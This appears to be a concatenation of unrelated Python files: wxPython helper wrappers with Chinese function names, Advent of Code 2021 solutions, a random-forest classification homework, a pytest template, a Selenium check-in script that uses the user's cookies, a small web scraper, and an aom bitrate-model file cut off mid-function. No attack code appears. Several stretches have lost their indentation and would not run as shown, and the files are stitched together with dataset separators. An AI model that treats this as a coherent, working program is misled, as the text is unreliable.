@组件_异常检测
def 程序_鼠标侧键2是否按下():
"返回True或False,判断鼠标侧边附加的按键是否按下"
return wx.GetMouseState().Aux2IsDown()
@组件_异常检测
def 程序_鼠标左键是否按下():
"返回True或False,判断鼠标左键是否按下"
return wx.GetMouseState().LeftIsDown()
@组件_异常检测
def 程序_鼠标中键是否按下():
"返回True或False,判断鼠标中键是否按下"
return wx.GetMouseState().MiddleIsDown()
@组件_异常检测
def 程序_鼠标右键是否按下():
"返回True或False,判断鼠标右键是否按下"
return wx.GetMouseState().RightIsDown()
@组件_异常检测
def 程序_取当前进程ID():
"返回当前程序进程PID"
return wx.GetProcessId()
@组件_异常检测
def 程序_系统环境是否支持中文():
"返回True或False 更多环境语言方法参考:https://wxpython.org/Phoenix/docs/html/wx.Language.enumeration.html#wx-language"
return wx.GetLocale().IsAvailable(wx.LANGUAGE_CHINESE)
@组件_异常检测
def 程序_取环境语言名称():
"返回示例: Chinese (Simplified) 更多环境语言方法参考:https://wxpython.org/Phoenix/docs/html/wx.Locale.html#wx-locale"
return wx.GetLocale().GetLocale()
@组件_异常检测
def 程序_取环境语言缩写():
    "返回示例: zh_CN 更多环境语言方法参考:https://wxpython.org/Phoenix/docs/html/wx.Locale.html#wx-locale"
    return wx.GetLocale().GetName()
@组件_异常检测
def 程序_系统是否已激活():
"返回True或False,不太确定是不是这个命令,获取更多电脑描述信息参考:https://wxpython.org/Phoenix/docs/html/wx.VersionInfo.html#wx-versioninfo"
return wx.GetLibraryVersionInfo().HasCopyright()
@组件_异常检测
def 程序_执行Dos(命令):
'运行cmd内的命令,只返回True跟False'
return wx.Shell(命令)
@组件_异常检测
def 组件_信息框(提示="",标题="提示",类型=0,父窗口=None):
"""
类型:
0.无图标信息框
1.带取消键普通信息框
2.带是/否键普通信息框
3.带帮助键普通信息框
4.带红色错误图标信息框
5.带黄色感叹标题信息框
6.带盾牌(类似权限验证)图标信息框
返回值:2.是 4.确定 8.否 16.取消/关闭 4096.帮助
"""
字典 = {0:262144,1:16,2:10,3:4096,4:512,5:256,6:524288}
return wx.MessageBox(提示,标题,字典[类型],父窗口)
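# Usage sketch (illustrative): ask a Yes/No question and test the reply against the
# return-code mapping documented in the docstring above (2 = "是"/Yes).
#   答案 = 组件_信息框("确定要删除吗?", "提示", 类型=2)
#   if 答案 == 2:
#       ...  # user clicked "是"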
@组件_异常检测
def 组件_提示信息框(内容):
"弹出一个带蓝色反向感叹号图标的信息框"
return wx.LogMessage(内容)
@组件_异常检测
def 组件_警告信息框(内容):
"弹出一个带黄色三角形感叹号图标的信息框"
return wx.LogWarning(内容)
@组件_异常检测
def 组件_报错信息框(内容):
"弹出一个带红叉图标的信息框"
return wx.LogError(内容)
@组件_异常检测
def 组件_文件选择器(标题="请选择文件",初始路径="",默认文件名="",过滤器="所有文件|*.*",父窗口=None):
"选择文件后返回完整文件路径,没选择返回空文本,可添加参数,flags(标识),parent(父窗口),x,y"
return wx.FileSelector(标题, 初始路径,默认文件名, wildcard=过滤器)
@组件_异常检测
def 组件_保存文件对话框(提示="",后缀="*",默认文件名="",父窗口=None):
"设置文件后返回完整文件路径,没选择返回空文本"
return wx.SaveFileSelector(提示, 后缀,默认文件名, 父窗口)
@组件_异常检测
def 组件_目录选择器(提示="",初始路径="",父窗口=None):
"选择目录后返回完整路径,没选择返回空文本,返回示例:c:\\user"
return wx.DirSelector(message=提示, default_path=初始路径,parent=父窗口)
@组件_异常检测
def 组件_颜色选择器(初始颜色=None,标题="请选择颜色",父窗口=None):
"选择颜色后返回颜色值(0,0,0,255),可添加参数,flags(标识),parent(父窗口),x,y"
return wx.GetColourFromUser(父窗口, 初始颜色,标题)
@组件_异常检测
def 组件_字体选择器(父窗口,默认字体=None,标题="请选择字体"):
"选择字体后返回字体类型"
return wx.GetFontFromUser(父窗口,默认字体 if 默认字体 else 父窗口.GetFont(),标题)
@组件_异常检测
def 组件_数值对话框(标题="请设置数值",提示="",参数提示="",默认值=1,最小值=1,最大值=100,父窗口=None):
"不能在线程里调用,弹出一个设置数值的对话框"
return wx.GetNumberFromUser(提示, 参数提示, 标题, 默认值, 最小值, 最大值, 父窗口)
@组件_异常检测
def 组件_密码对话框(提示="",标题="请输入密码",默认文本="",父窗口=None):
"弹出一个文本对话框,输入的内容会被替换成圆点,适合密码等输入使用,确认后返回输入的内容,取消返回空文本"
return wx.GetPasswordFromUser(message=提示,caption=标题, default_value=默认文本,parent=父窗口)
@组件_异常检测
def 组件_单选列表对话框(提示="",标题="请选择",选择项=['未设置'],初始选中=0,父窗口=None):
"弹出一个单选列表对话框,选择后返回选中的文本内容,取消返回空,选择项必须是文本型列表,初始选中从0开始"
return wx.GetSingleChoice(message=提示,caption=标题,choices=选择项,initialSelection=初始选中,parent=父窗口)
@组件_异常检测
def 组件_普通对话框(提示="",标题="请输入",默认文本='',父窗口=None):
"弹出一个对话框输入文本,确认后返回输入的文本,取消返回空"
return wx.GetTextFromUser(message=提示,caption=标题,default_value=默认文本,parent=父窗口)
@组件_异常检测
def 组件_气泡提示框(父窗口,提示="",标题="",超时时间=3000,x=0,y=0):
"弹出一个气泡提示框,默认在组件中间,可通过设置x,y调整"
气泡 = wx.adv.RichToolTip(标题,提示)
气泡.SetTimeout(超时时间)
气泡.ShowFor(父窗口,(0,0,x*2,y*2))
@组件_异常检测
def 组件_系统弹窗(父窗口=None,提示="",标题=""):
"电脑右下角弹出一个提示框,可以绑定提示框点击事件,详细操作:https://wxpython.org/Phoenix/docs/html/wx.adv.NotificationMessage.html#wx.adv.NotificationMessage.Show"
提示框 = wx.adv.NotificationMessage(标题,提示,父窗口)
提示框.Show()
``` |
{
"source": "1451678/adventofcode",
"score": 3
} |
#### File: adventofcode/2021/day13.py
```python
with open("13.in") as file:
lines = file.readlines()
lines = [line.rstrip() for line in lines]
def initGrid():
i = 0
rmax = 0
cmax = 0
while(lines[i] != ""):
r = int(lines[i].split(",")[0])
c = int(lines[i].split(",")[1])
if r > rmax:
rmax = r
if c > cmax:
cmax = c
i += 1
G = []
for i in range(0, cmax+1):
row = [0] * (rmax+1)
G.append(row)
return G
def foldX(G, line):
X = []
for r in range(0, len(G)):
row = [0] * line
X.append(row)
for r in range(0, len(G)):
for c in range(0, line):
X[r][c] = G[r][c]
for r in range(0, len(G)):
for c in range(2*line, line, -1):
if len(G[0]) > c and X[r][2*line-c] == 0:
X[r][2*line-c] += G[r][c]
return X
def foldY(G, line):
X = []
for r in range(0, line):
row = [0] * len(G[0])
X.append(row)
for r in range(0, line):
for c in range(0, len(G[0])):
X[r][c] = G[r][c]
for r in range(2*line, line, -1):
for c in range(0, len(G[0])):
if len(G) > r and X[2*line-r][c] == 0:
X[2*line-r][c] += G[r][c]
return X
def fold(index):
global G
direction, line = lines[index].split("=")
if "x" in direction:
G = foldX(G, int(line))
else:
G = foldY(G, int(line))
# Part 1
G = initGrid()
index = 0
while(lines[index] != ""):
c = int(lines[index].split(",")[0])
r = int(lines[index].split(",")[1])
G[r][c] = 1
index += 1
fold(index+1)
result = 0
for i in range(0, len(G)):
result += sum(G[i])
print(result)
# Part 2
for j in range(index+2, len(lines)):
fold(j)
for r in range(0, len(G)):
out = ""
for c in range(0, len(G[0])):
if G[r][c] == 0:
out += " "
else:
out += "##"
print(out)
```
#### File: adventofcode/2021/day14.py
```python
import collections
import copy
import math
with open("14.in") as file:
lines = file.readlines()
lines = [line.rstrip() for line in lines]
def addOrSet(dict, key, value):
if key in dict:
dict[key] += value
else:
dict[key] = value
def solve(steps):
start = lines[0]
after = {}
for i in range(0, len(start)-1):
addOrSet(after, start[i:i+2], 1)
insertions = {}
for i in range(2, len(lines)):
pair, insertion = lines[i].split(" -> ")
insertions[pair] = insertion
counter = {}
for i in range(0, steps):
before = copy.deepcopy(after)
for j in range(0, len(list(insertions))):
insertion = list(insertions)[j]
if insertion in before and before[insertion] > 0:
addOrSet(after, insertion[0] + list(insertions.values())[j], before[insertion])
addOrSet(after, list(insertions.values())[j] + insertion[1], before[insertion])
after[insertion] -= before[insertion]
for i in range(0, len(after)):
addOrSet(counter, list(after.keys())[i][0], list(after.values())[i])
addOrSet(counter, list(after.keys())[i][1], list(after.values())[i])
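    # Each element is counted twice here (once as the left and once as the right member
    # of a pair), except the first and last element of the template, which only appear
    # in one pair; the ceil(count / 2) below corrects both cases at once.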
for i in range(0, len(counter)):
counter[list(counter.keys())[i]] = math.ceil(
list(counter.values())[i]/2)
s = sorted(counter.items(), key=lambda item: item[1])
print(s[len(s)-1][1]-s[0][1])
# Part 1
solve(10)
# Part 2
solve(40)
```
#### File: adventofcode/2021/day15.py
```python
from collections import defaultdict
from heapq import *
import copy
with open("15.in") as file:
lines = file.readlines()
lines = [line.rstrip() for line in lines]
def fillGrid():
for line in lines:
G.append(list([int(x) for x in line]))
def createEdges(G):
edges = []
for r in range(0, len(G)):
for c in range(0, len(G[0])):
if c-1 >= 0:
edges.append((r*len(G[0])+c-1, r*len(G[0])+c, G[r][c]))
if r-1 >= 0:
edges.append(((r-1)*len(G[0])+c, r*len(G[0])+c, G[r][c]))
if r+1 < len(G):
edges.append(((r+1)*len(G[0])+c, r*len(G[0])+c, G[r][c]))
if c+1 < len(G[0]):
edges.append((r*len(G[0])+c+1, r*len(G[0])+c, G[r][c]))
return edges
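# Each grid cell (r, c) is encoded as graph node id r * len(G[0]) + c, and every edge is
# a tuple (from_node, to_node, cost), where the cost is the risk of entering the target
# cell; dijkstra() below unpacks these tuples as (l, r, c).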
def dijkstra(edges, f, t):
g = defaultdict(list)
for l, r, c in edges:
g[l].append((c, r))
q, seen, mins = [(0, f, [])], set(), {f: 0}
while q:
(cost, v1, path) = heappop(q)
if v1 not in seen:
seen.add(v1)
path = [v1] + path
if v1 == t:
return (cost, path)
for c, v2 in g.get(v1, ()):
if v2 in seen:
continue
prev = mins.get(v2, None)
next = cost + c
if prev is None or next < prev:
mins[v2] = next
heappush(q, (next, v2, path))
return (float("inf"), [])
# Part 1
G = []
fillGrid()
edges = createEdges(G)
print(dijkstra(edges, 0, len(G)*len(G[0])-1)[0])
# Part 2
G2 = copy.deepcopy(G)
for i in range(1, 5):
for r in range(0, len(G)):
line = [x+i for x in G[r]]
for c in range(0, len(line)):
if line[c] > 9:
line[c] = line[c] - 9
G2[r].extend(line)
for i in range(1, 5):
for r in range(0, len(G)):
line = [x+i for x in G2[r]]
for c in range(0, len(line)):
if line[c] > 9:
line[c] = line[c] - 9
G2.append(line)
edges = createEdges(G2)
print(dijkstra(edges, 0, len(G2)*len(G2[0])-1)[0])
``` |
{
"source": "1452712/DataMining_course_project",
"score": 3
} |
#### File: DataMining_course_project/hw3/q1_randomForest.py
```python
import numpy as np
import pandas as pd
import math
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
# import data
def importData(inFile):
data = pd.read_csv(inFile)
out = {}
out["RSSI"] = []
out["Grid"] = []
minLon = 121.47738 # min(data["Longitude"])
    maxLon = 121.5025075 # max(data["Longitude"])
lonCount = math.ceil((maxLon - minLon) / 0.0001)
minLat = 31.20891667 # min(data["Latitude"])
maxLat = 31.219175 # max(data["Latitude"])
latCount = math.ceil((maxLat - minLat) / 0.0001)
for i in range(len(data)):
# Strength of Signal
# RSSI = RSCP – EcNo
out["RSSI"].append([data["RSCP_1"][i] - data["EcNo_1"][i]])
# GPS Grid ID
x = int((data["Longitude"][i] - minLon) / 0.0001)
y = int((data["Latitude"][i] - minLat) / 0.0001)
out["Grid"].append(int(x + y * lonCount))
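        # Worked example (hypothetical reading, ignoring float rounding):
        #   Longitude = 121.48000, Latitude = 31.21000
        #   x = int((121.48000 - 121.47738) / 0.0001)           = 26
        #   y = int((31.21000 - 31.20891667) / 0.0001)          = 10
        #   lonCount = ceil((121.5025075 - 121.47738) / 0.0001) = 252
        #   Grid ID  = 26 + 10 * 252 = 2546
        # i.e. the area is cut into ~0.0001-degree cells and the grid ID is the
        # row-major index of the cell containing the GPS fix.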
return out
# calculate accuracy
def getAccuracy(res, target):
if len(res) != len(target):
return 0
num = len(res)
count = 0
for i in range(num):
if int(res[i]) == target[i]:
count = count + 1
return float(count) / float(num) * 100
"""
"main" function
"""
# LTE
#train_data = importData("new4gtrain.csv")
#test_data = importData("new4gtest.csv")
#estimators = 7
# GSM
train_data = importData("new2gtrain.csv")
test_data = importData("new2gtest.csv")
cla_estimators = 10
reg_estimators = 10
# Random Forest Classifier
acc = []
for i in range(10):
classifier = RandomForestClassifier(n_estimators=cla_estimators)
classifier.fit(train_data["RSSI"], train_data["Grid"])
cla_res = classifier.predict(test_data["RSSI"])
cla_accuracy = getAccuracy(cla_res, test_data["Grid"])
acc.append(cla_accuracy)
acc.sort()
plt.plot(acc, range(1, 11))
plt.xlabel("No.")
plt.ylabel("Accuracy")
plt.show()
print("Med-accuracy of Random Forest Classifier is %d" % acc[6])
# Random Forest Regressor
reg_acc = []
for i in range(10):
    regressor = RandomForestRegressor(n_estimators=reg_estimators)
regressor.fit(train_data["RSSI"], train_data["Grid"])
reg_res = regressor.predict(test_data["RSSI"])
reg_accuracy = getAccuracy(reg_res, test_data["Grid"])
reg_acc.append(reg_accuracy)
reg_acc.sort()
plt.plot(reg_acc, range(1, 11))
plt.xlabel("No.")
plt.ylabel("Accuracy")
plt.show()
print("Med-accuracy of Random Forest Regressor is %d" % reg_acc[6])
``` |
{
"source": "1455033987/mkbrowser",
"score": 3
} |
#### File: main/python/hello.py
```python
from java import jclass
from goose3 import Goose
from goose3.text import StopWordsChinese
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
def gethtmldes(url):
g = Goose({'browser_user_agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) ','stopwords_class': StopWordsChinese})
article = g.extract(url=url)
return article.meta_description
# def greet(name):
# print("--- hello,%s ---" % name)
#
# def add(a,b):
# return a + b
#
# def sub(count,a=0,b=0,c=0):
# return count - a - b -c
#
# def get_list(a,b,c,d):
# return [a,b,c,d]
#
# def print_list(data):
# print(type(data))
# # Iterate over the Java ArrayList object
# for i in range(data.size()):
# print(data.get(i))
# Calling a Java class from Python
def get_java_bean():
    JavaBean = jclass("cn.mkblog.www.mkbrowser.JavaBean")  # use your own package name here
jb = JavaBean("python")
jb.setData("json")
jb.setData("xml")
jb.setData("xhtml")
return jb
``` |
{
"source": "145k0v/classification-python",
"score": 3
} |
#### File: classification-python/tests/test_payload_converters.py
```python
from classification import entities, payloadconverters
from pytest import fixture
def test_student_to_tasks_to_save_request_conversion():
input = {'student_1': {'lab1': 5, 'lab2': 10},
'student_2': {'lab3': 50, 'lab4': -101}}
expected = [
entities.StudentClassificationPreviewDto(
classification_identifier='lab1',
student_username='student_1',
value=5),
entities.StudentClassificationPreviewDto(
classification_identifier='lab2',
student_username='student_1',
value=10),
entities.StudentClassificationPreviewDto(
classification_identifier='lab4',
student_username='student_2',
value=-101),
entities.StudentClassificationPreviewDto(
classification_identifier='lab3',
student_username='student_2',
value=50),
]
actual = payloadconverters.save_request_from_s2t(input)
assert len(actual) == len(expected)
for e in expected:
assert e in actual
def test_task_to_students_to_save_request_conversion():
input = {'lab1': {'student_1': 14, 'student_3': -21},
'lab2': {'student_2': 66, 'student_4': 'over9000'}}
expected = [
entities.StudentClassificationPreviewDto(
classification_identifier='lab1',
student_username='student_1',
value=14),
entities.StudentClassificationPreviewDto(
classification_identifier='lab2',
student_username='student_2',
value=66),
entities.StudentClassificationPreviewDto(
classification_identifier='lab1',
student_username='student_3',
value=-21),
entities.StudentClassificationPreviewDto(
classification_identifier='lab2',
student_username='student_4',
value='over9000'),
]
actual = payloadconverters.save_request_from_t2s(input)
assert len(actual) == len(expected)
for e in expected:
assert e in actual
@fixture
def get_request_payload():
return [
{'classificationMap':
{'lab01': 1.0,
'mark': 'F',
'pandas': 3.75,
'sem_check': False,
'tasks': 4.75,
'tasks_check': False,
'total': 4.75},
'email': '...@<EMAIL>',
'firstName': '...',
'fullName': None,
'lastName': '...',
'username': 'student_1'},
{'classificationMap':
{'lab01': 5.0,
'lab02': 3.0,
'lab03': 4.8,
'lab04': 3.0,
'lab05': 4.2,
'mark': 'F',
'sem_approved': True,
'sem_check': False,
'sem_def': 'https://github.com/...',
'tasks': 25.0,
'tasks_check': True,
'total': 25.0,
'wt01': 5.0},
'email': '...@<EMAIL>',
'firstName': '...',
'fullName': None,
'lastName': '...',
'username': 'student_2'},
{'classificationMap':
{'lab01': 2.0,
'lab03': 4.8,
'lab04': 5.0,
'lab05': 4.5,
'mark': 'F',
'pandas': 4.375,
'sem_approved': True,
'sem_check': False,
'sem_def': 'https://gitlab.fit.cvut.cz/...',
'tasks': 32.675,
'tasks_check': True,
'total': 32.675,
'wt01': 5.0,
'wt02': 2.0,
'wt3': 5.0},
'email': '...@<EMAIL>',
'firstName': '...',
'fullName': None,
'lastName': '...',
'username': 'student_3'}
]
def test_student_to_tasks_from_get_response_converter(get_request_payload):
input = get_request_payload
expected = {'student_1': {'lab01': 1.0,
'mark': 'F',
'pandas': 3.75,
'sem_check': False,
'tasks': 4.75,
'tasks_check': False,
'total': 4.75},
'student_2': {'lab01': 5.0,
'lab02': 3.0,
'lab03': 4.8,
'lab04': 3.0,
'lab05': 4.2,
'mark': 'F',
'sem_approved': True,
'sem_check': False,
'sem_def': 'https://github.com/...',
'tasks': 25.0,
'tasks_check': True,
'total': 25.0,
'wt01': 5.0},
'student_3': {'lab01': 2.0,
'lab03': 4.8,
'lab04': 5.0,
'lab05': 4.5,
'mark': 'F',
'pandas': 4.375,
'sem_approved': True,
'sem_check': False,
'sem_def': 'https://gitlab.fit.cvut.cz/...',
'tasks': 32.675,
'tasks_check': True,
'total': 32.675,
'wt01': 5.0,
'wt02': 2.0,
'wt3': 5.0}
}
actual = payloadconverters.s2t_from_get_response(input)
assert actual == expected
def test_task_to_students_from_get_response_converter(get_request_payload):
input = get_request_payload
expected = {'lab01': {'student_1': 1.0,
'student_2': 5.0,
'student_3': 2.0},
'mark': {'student_1': 'F',
'student_2': 'F',
'student_3': 'F'},
'pandas': {'student_1': 3.75,
'student_3': 4.375},
'sem_check': {'student_1': False,
'student_2': False,
'student_3': False},
'tasks': {'student_1': 4.75,
'student_2': 25.0,
'student_3': 32.675},
'tasks_check': {'student_1': False,
'student_2': True,
'student_3': True},
'total': {'student_1': 4.75,
'student_2': 25.0,
'student_3': 32.675},
'lab02': {'student_2': 3.0},
'lab03': {'student_2': 4.8,
'student_3': 4.8},
'lab04': {'student_2': 3.0,
'student_3': 5.0},
'lab05': {'student_2': 4.2,
'student_3': 4.5},
'sem_approved': {'student_2': True,
'student_3': True},
'sem_def': {'student_2': 'https://github.com/...',
'student_3': 'https://gitlab.fit.cvut.cz/...'},
'wt01': {'student_2': 5.0,
'student_3': 5.0},
'wt02': {'student_3': 2.0},
'wt3': {'student_3': 5.0}
}
actual = payloadconverters.t2s_from_get_response(input)
assert actual == expected
``` |
{
"source": "1462903025/zodgame_checkin",
"score": 3
} |
#### File: zodgame_checkin/zodgame/zodgame.py
```python
import re
import sys
from selenium import webdriver
def zodgame(cookie_string):
options = webdriver.ChromeOptions()
options.add_argument('--headless')
#options.add_argument("user-agent=Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Mobile Safari/537.36")
driver = webdriver.Chrome(options = options)
cookie_dict = [ {"name" : x.split('=')[0].strip(), "value": x.split('=')[1].strip()} for x in cookie_string.split(';')]
url = "https://zodgame.xyz/plugin.php?id=dsu_paulsign:sign"
driver.get(url)
driver.delete_all_cookies()
for cookie in cookie_dict:
driver.add_cookie({
"domain": "zodgame.xyz",
"name": cookie["name"],
"value": cookie["value"],
"path": "/",
})
driver.get(url)
try:
driver.find_element_by_xpath('//div[@class="bm_h cl"]')
except:
print("Login failed, Please check the cookie.")
assert False, "Login failed, Please check the cookie."
formhash = driver.find_element_by_xpath('//input[@name="formhash"]').get_attribute('value')
url2 = "https://zodgame.xyz/plugin.php?id=dsu_paulsign:sign&operation=qiandao&infloat=1&inajax=0"
ajax_query = """
(function (){
var request = new XMLHttpRequest();
var fd = new FormData();
fd.append("formhash","%s");
fd.append("qdxq","kx");
request.open("POST","%s",false);
request.withCredentials=true;
request.send(fd);
return request;
})();
""" % (formhash, url2)
ajax_query = ajax_query.replace("\n", "")
resp = driver.execute_script("return " + ajax_query)
match = re.search('<div class="c">\n(.*?)</div>\n',resp["response"],re.S)
if match is not None:
message = match.group(1)
else:
message = "签到失败"
print(message)
if "您今日已经签到,请明天再来" in message or "恭喜你签到成功!" in message:
pass
else:
assert False
driver.close()
driver.quit()
if __name__ == "__main__":
cookie_string = sys.argv[1]
if cookie_string:
zodgame(cookie_string)
else:
print("未配置Cookie")
``` |
{
"source": "1466899531/auto_api_test",
"score": 2
} |
#### File: auto_api_test/scripts/test_template.py
```python
import pytest
import requests
from time import sleep
from api.template_api import TemplateAPI
from tools.get_log import GetLog
from tools.read_file import read_json
import allure
# 获取日志器
log = GetLog.get_log()
@allure.feature('测试类模板')
@pytest.mark.skip(reason="参考模板, 不执行")
class TestTemplate:
session = None
# 初始化方法
@classmethod
def setup_class(cls):
cls.session = requests.Session() # 初始化session对象
cls.template = TemplateAPI()
# 结束方法
@classmethod
def teardown_class(cls):
cls.session.close()
@classmethod
def setup(cls):
sleep(1.5)
# 测试方法
@allure.story("测试方法模板-add")
@pytest.mark.parametrize(("attr1", "attr2", "success", "expect"), read_json("test_add"))
def test_add(self, attr1, attr2, success, expect):
# 添加功能API调用
response = self.template.api_add(self.session, attr1, attr2)
# 打印日志
log.info("添加功能-状态码为: {}".format(response.status_code))
# 断言状态码
assert response.status_code == expect, "状态码断言失败"
@allure.story("测试方法模板-upd")
@pytest.mark.parametrize(("attr1", "attr2", "success", "expect"), read_json("test_upd"))
def test_upd(self, attr1, attr2, success, expect):
# 添加功能API调用
response = self.template.api_upd(self.session, attr1, attr2)
# 打印日志
log.info("修改功能-状态码为: {}".format(response.status_code))
# 断言状态码
assert response.status_code == expect, "状态码断言失败"
@allure.story("测试方法模板-get")
@pytest.mark.parametrize(("attr1", "attr2", "success", "expect"), read_json("test_get"))
def test_get(self, attr1, attr2, success, expect):
# 添加功能API调用
response = self.template.api_get(self.session, attr1, attr2)
# 打印日志
log.info("查询功能-状态码为: {}".format(response.status_code))
# 断言状态码
assert response.status_code == expect, "状态码断言失败"
@allure.story("测试方法模板-del")
@pytest.mark.parametrize(("uid", "success", "expect"), read_json("test_del"))
def test_del(self, uid, success, expect):
# 添加功能API调用
response = self.template.api_del(self.session, uid)
# 打印日志
log.info("删除功能-状态码为: {}".format(response.status_code))
# 断言状态码
assert response.status_code == expect, "状态码断言失败"
``` |
{
"source": "146790g/pytorch_handbook",
"score": 3
} |
#### File: pytorch_handbook/appendix/table_dataset.py
```python
import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
def main():
## 各種設定
num_workers = 2 # データ読み込みに使用するサブプロセス数の設定
batch_size = 30 # バッチサイズの設定
epoch_size = 20 # エポックサイズの設定
## データセットとデータローダー
df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data', header=None,
names=['sepal-length',
'sepal-width',
'petal-length',
'petal-width',
'class']) # UCI Machine Learning RepositoryのIrisのデータセットを例として使用
class_mapping = {label:idx for idx, label in enumerate(np.unique(df['class']))}
df['class'] = df['class'].map(class_mapping) # クラスラベルを整数にエンコーディング
features = torch.tensor(df[['sepal-length', 'sepal-width', 'petal-length', 'petal-width']].values,
dtype=torch.float) # 説明変数のTensor
labels = torch.tensor(df['class'].values, dtype=torch.long) # 目的変数のTensor
dataset = torch.utils.data.TensorDataset(features, labels) # データセット作成
# データセットを80:20:50でトレーニングデータセット:バリデーションデータセット:テストデータセットに分割
train_set, valid_set, test_set = torch.utils.data.random_split(dataset, lengths=[80, 20, 50])
# トレーニングデータセットのデータローダー
train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=num_workers)
# バリデーションデータセットのデータローダー
valid_loader = torch.utils.data.DataLoader(valid_set, batch_size=batch_size, shuffle=False, num_workers=num_workers)
# テストデータセットのデータローダー
test_loader = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False, num_workers=num_workers)
## ニューラルネットワークの設定
net = torch.nn.Sequential(
nn.Linear(4, 64),
nn.ReLU(),
nn.Linear(64, 128),
nn.ReLU(),
nn.Linear(128, 64),
nn.ReLU(),
nn.Linear(64, 4)
) # MLP
print(net)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print('device:', device)
net.to(device) # for GPU
## 損失関数とオプティマイザーの設定
criterion = nn.CrossEntropyLoss() # 損失関数(ソフトマックス交差エントロピー)
optimizer = optim.Adam(net.parameters(), lr=0.001) # オプティマイザー(Adamオプティマイザー)
## 学習実行
epoch_list = []
train_acc_list = []
valid_acc_list = []
for epoch in range(epoch_size): # エポックのループ
net.train() # ニューラルネットを訓練モードに設定
train_true = []
train_pred = []
for itr, data in enumerate(train_loader): # トレーニングのループ
features, labels = data
train_true.extend(labels.tolist()) # クラスラベルのGround-Truthをリストに追加
features, labels = features.to(device), labels.to(device) # for GPU
optimizer.zero_grad() # 勾配をリセット
logits = net(features) # ニューラルネットでロジットを算出
loss = criterion(logits, labels) # 損失値を算出
loss.backward() # 逆伝播
optimizer.step() # オプティマイザーでニューラルネットのパラメータを更新
_, predicted = torch.max(logits.data, 1) # 最大のロジットからクラスラベルの推論値を算出
train_pred.extend(predicted.tolist()) # 推論結果をリストに追加
print('[epochs: {}, mini-batches: {}, records: {}] loss: {:.3f}'.format(
epoch + 1, itr + 1, (itr + 1) * batch_size, loss.item())) # 損失値の表示
net.eval() # ニューラルネットを評価モードに設定
valid_true = []
valid_pred = []
for itr, data in enumerate(valid_loader): # バリデーションのループ
features, labels = data
valid_true.extend(labels.tolist()) # クラスラベルのGround-Truthをリストに追加
features, labels = features.to(device), labels.to(device) # for GPU
with torch.no_grad(): # バリデーションなので勾配計算OFF
logits = net(features)
_, predicted = torch.max(logits.data, 1) # 最大のロジットからクラスラベルの推論値を算出
valid_pred.extend(predicted.tolist()) # 推論結果をリストに追加
train_acc = accuracy_score(train_true, train_pred) # トレーニングでの正答率をsklearnの機能で算出
valid_acc = accuracy_score(valid_true, valid_pred) # バリデーションでの正答率をsklearnの機能で算出
# エポックごとのトレーニングとバリデーションの正答率を表示
print(' epocs: {}, train acc.: {:.3f}, valid acc.: {:.3f}'.format(epoch + 1, train_acc, valid_acc))
print()
epoch_list.append(epoch + 1) # ログ用
train_acc_list.append(train_acc)
valid_acc_list.append(valid_acc)
print('Finished Training')
print('Save Network')
torch.save(net.state_dict(), 'model.pth') # 学習したパラメータを保存
df = pd.DataFrame({'epoch': epoch_list,
'train/accuracy': train_acc_list,
'valid/accuracy': valid_acc_list}) # ログ用にデータフレームを作成
print('Save Training Log')
df.to_csv('train.log', index=False) # データフレームをCSVで保存
## 学習後の推論実行
net.eval() # ニューラルネットを評価モードに設定
test_true = []
test_pred = []
for itr, data in enumerate(test_loader): # バリデーションのループ
features, labels = data
test_true.extend(labels.tolist()) # クラスラベルのGround-Truthをリストに追加
features, labels = features.to(device), labels.to(device) # for GPU
with torch.no_grad(): # バリデーションなので勾配計算OFF
logits = net(features)
_, predicted = torch.max(logits.data, 1) # 最大のロジットからクラスラベルの推論値を算出
test_pred.extend(predicted.tolist()) # 推論結果をリストに追加
test_acc = accuracy_score(test_true, test_pred) # テストでの正答率をsklearnの機能で算出
print('test acc.: {:.3f}'.format(test_acc))
if __name__ == '__main__':
main()
``` |
{
"source": "1474net/d",
"score": 3
} |
#### File: app/utils/scrap.py
```python
import requests
# establishing session
s = requests.Session()
s.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:45.0) Gecko/20100101 Firefox/45.0'
})
def load_user_data(page, session):
url = 'http://www.mfc-chita.ru/filial/chita/vopros-otvet?&&&page=%d' % (page)
request = session.get(url)
return request.text
# download the first 26 result pages (0-25) and save them to disk
for page in range(26):
    data = load_user_data(page, s)
    with open('./user_data/page_%d.html' % (page), 'wb') as output_file:
        output_file.write(data.encode('utf-8'))
``` |
{
"source": "1480c1/aom",
"score": 3
} |
#### File: gop_bitrate/python/bitrate_accuracy_percentage_error.py
```python
import numpy as np
# Finds the coefficient to multiply A by to minimize
# the percentage error between A and B.
def minimize_percentage_error_model_a(A, B):
z = np.where(B == 0)[0]
A = np.delete(A, z, axis=0)
B = np.delete(B, z, axis=0)
z = np.where(A == 0)[0]
A = np.delete(A, z, axis=0)
B = np.delete(B, z, axis=0)
R = np.divide(A, B)
num = 0
den = 0
for r_i in R:
num += r_i
den += r_i**2
if den == 0:
x = 0
else:
x = (num / den)[0]
return x
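# Derivation of the closed form above: with r_i = A_i / B_i, the total squared
# percentage error is
#   E(x) = sum_i ((x * A_i - B_i) / B_i)^2 = sum_i (x * r_i - 1)^2
# and setting dE/dx = 2 * sum_i r_i * (x * r_i - 1) = 0 gives
#   x = sum_i r_i / sum_i r_i^2,
# i.e. exactly num / den as computed in the loop.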
def minimize_percentage_error_model_b(r_e, r_m, r_f):
z = np.where(r_f == 0)[0]
r_e = np.delete(r_e, z, axis=0)
r_m = np.delete(r_m, z, axis=0)
r_f = np.delete(r_f, z, axis=0)
r_ef = np.divide(r_e, r_f)
r_mf = np.divide(r_m, r_f)
sum_ef = np.sum(r_ef)
sum_ef_sq = np.sum(np.square(r_ef))
sum_mf = np.sum(r_mf)
sum_mf_sq = np.sum(np.square(r_mf))
sum_ef_mf = np.sum(np.multiply(r_ef, r_mf))
